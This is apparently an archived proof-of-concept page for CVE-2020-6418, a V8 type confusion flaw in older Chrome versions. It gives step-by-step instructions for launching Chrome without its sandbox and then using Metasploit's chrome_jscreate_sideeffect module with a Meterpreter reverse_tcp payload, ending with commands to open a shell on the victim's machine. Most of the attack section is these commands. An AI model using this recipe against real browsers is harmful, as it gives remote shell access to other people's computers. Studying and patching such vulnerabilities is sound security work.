Related vulnerability
Introduction
# CVE-2020-6418
CVE-2020-6418 is a type confusion bug in V8 in Google Chrome. The affected versions were those prior to 80.0.3987.122. The vulnerability lets a remote attacker obtain a shell on a target device via a crafted HTML page.
## Environment Requirements
1) Google Chrome with a version prior to 80.0.3987.122.
```
Note : The Google Chrome browser must run with no sandbox for the exploit to be successful.
```
2) Metasploit Framework
3) OS : Any
### Exploit Set Up
1) Google Chrome Version v80.0.3987.87 <br />
https://www.neowin.net/news/google-chrome-800398787-offline-installer/
2) Windows v11
3) Kali Linux v2021.1
## Google Chrome Set-Up with no sandbox
i) Create a shortcut for Google Chrome <br />
ii) Open Properties > go to the field called "Target" <br />
iii) At the end of the EXE path, add a space and enter --no-sandbox <br />
iv) Click Apply > OK <br />
v) Open a new Google Chrome window and you will see a pop-up stating the below.
```
You are using an unsupported command-line flag: --no-sandbox. Stability and security will suffer
```
### Demonstration to Disable Sandbox
https://user-images.githubusercontent.com/49935118/159386732-dc812ab2-f22e-4eb4-9585-4783a55b6706.mp4
## Using Metasploit
Since we are using Kali as the environment to carry out the exploit, Metasploit comes as a built-in tool with the distro. If you are using another distro, you need to set up Metasploit before beginning the exploit.
Refer to the **Metasploit installation** for further understanding.
## Performing the exploit
i) Start the Metasploit framework
```
> msfconsole
```
ii) Find the exploit
```
> search chrome_js
```
iii) Use the exploit listed in the above output
```
> use exploit/multi/browser/chrome_jscreate_sideeffect
```
iv) Provide the SRVHOST IP address
```
> set SRVHOST <ip address>
```
v) Provide the target
Here we get two options:
1) Target 0 : For Windows
2) Target 1 : For Mac
```
> set TARGET <number>
```
vi) Provide the payload
```
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
```
vii) Check the current settings and enabled options
```
> show options
```
viii) Run the exploit
```
> run
```
(or `> exploit`)
ix) You will be provided with a URL, which should be opened in the browser for the session to become active.
x) Once the user accesses the URL, a session will be created. To check this:
```
> sessions -l
```
xi) Using the session, we can check the user's system info or enter the shell.
```
> sessions <number>
> shell
```
### Demonstration to exploit
https://user-images.githubusercontent.com/49935118/159605013-d6033f7f-8fcc-4617-8f8e-6b909a5aebe6.mp4
File snapshot
[4.0K] /data/pocs/7856a1c81756a37759b58c4c2bb791fb67a86908
├── [3.0K] Explanation of vulnerability
├── [3.5K] Metasploit framework.md
├── [ 910] Patch Work Analysis.md
└── [2.6K] README.md
0 directories, 4 files
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.